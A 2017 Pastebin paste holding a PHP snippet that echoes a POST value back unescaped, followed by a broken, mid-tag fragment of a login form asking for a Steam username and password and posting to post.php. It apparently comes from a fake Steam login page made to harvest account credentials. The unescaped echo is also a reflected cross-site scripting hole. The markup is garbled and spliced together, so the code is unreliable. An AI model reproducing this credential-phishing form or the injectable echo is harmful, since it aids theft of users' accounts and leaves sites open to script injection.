Advertisement
Guest User

Untitled

a guest
May 14th, 2017
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.54 KB | None | 0 0
  1. "<?php
  2.  
  3. $lala = $_POST['variable'];
  4. echo $lala;
  5.  
  6. ?> ="post.php" method="POST" name="loginForm" id="loginForm">
  7.  
  8.                 <input type="hidden" name="action" value="doLogin" />
  9.                 <input type="hidden" name="goto" value="" />
  10.                 <label for="steamAccountName">Steam Username:</label>
  11.                 <input class="textField" type="text" name="steamAccountName" id="steamAccountName" /><br />
  12.                 <label for="steamPassword">Password:</label>
  13.                 <input class="textField" type="password" name="steamPassword" id="steamPassword" autocomplete="off" /><br />
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement